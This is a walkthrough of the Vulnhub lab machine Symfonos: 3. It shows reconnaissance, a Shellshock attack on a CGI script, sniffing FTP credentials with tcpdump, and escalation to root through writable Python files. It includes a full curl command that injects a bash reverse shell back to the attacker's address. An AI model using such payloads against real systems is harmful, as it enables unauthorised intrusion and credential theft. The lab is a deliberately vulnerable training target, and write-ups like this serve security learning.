Symfonos: 3 - Walkthrough

# Symfonos: 3 - Walkthrough ### Machine Details #### Name: Symfonos: 3 #### OS: Linux #### Platform: [Vulnhub](https://www.vulnhub.com) #### Download Link: [Symfonos 3](https://www.vulnhub.com/entry/symfonos-31,332/) ___ ### Getting started After obtaining an IP address for the machine, 192.168.50.137 in my case. I addeed it to mu hosts file. ``` 192.168.50.137 symfonos3.local ``` As always, I ran a quck nmap scan on the target and the following output was obtained. ![](https://i.imgur.com/PPZH9uL.png) ### Getting Trolled HARD Visting the web service on port 80, I got the page below ![](https://i.imgur.com/Nn2mNhZ.png) Checking the source code, there was a comment which I thought was interesting. ![](https://i.imgur.com/674VlR9.png) I ran a directory search using dirb and found some pages. ![](https://i.imgur.com/MU6wRU1.png) My mistake was, I only paid attention to the /gate directory and I followed it down a deep rabbit hole xD. ![](https://i.imgur.com/wuu09NC.png) ### Getting Foothold Going back to the directory scan, there is a `cgi-bin` directory. I ran another scan on this directory and found `underworld`. ![](https://i.imgur.com/MSujbI5.png) `cgi-bin` has a couple of exploit techniques which you can read more about [here](https://book.hacktricks.xyz/pentesting/pentesting-web/cgi). To obtain a shell, I used Shellshock. ``` curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.50.128/9001 0>&1' http://symfonos3.local/cgi-bin/underworld ``` > To quickly test if an endpoint is vulnerable to shellshock, I found [Shellshocker](https://github.com/erinzm/shellshocker) useful. Now I have a reverse shell as the `cerberus` user. ![](https://i.imgur.com/nXiqIGo.png) ### Privilege Escalation Checking the id of the user I have a shell as, I noticed this user belongs to the pcap group. Which means, this user can read network traffic. ![](https://i.imgur.com/tyxAiro.png) Using the command below, I was able to sniff network traffic. ``` tcpdump -i lo -w file.pcap ``` After leaving it to run for some time, I exited it and opened the `file.pcap` file using the command below. ``` tcpdump -r file.pcap ``` ![](https://i.imgur.com/XhFISG7.png) Going through the traffic, I saw FTP login requests containing user `hades` credentials. ### User Hades I logged in as hades via SSH. Following similar procedure, I checked the id and noticed that this user belongs to a group called `gods`. I ran a find to see what files belongs to this group and I got two python files which are writeable. ``` find / -type f -group gods -ls 2>/dev/null ``` ![](https://i.imgur.com/BZgaYjF.png) ### Road to ROOT! Since the file is writeable, I edited it to contain code to return a reverse shell to me and after some minutes, I got a connection as the root user. ![](https://i.imgur.com/HLPb519.png) ![](https://i.imgur.com/s07E1aT.png) And that's SYMFONOS: 3. Hope you enjoyed reading. See you at the next one. ###### tags: `symfonos` `vulnhub` `cgi-bin` `shellshocker` `pcap` `tcpdump`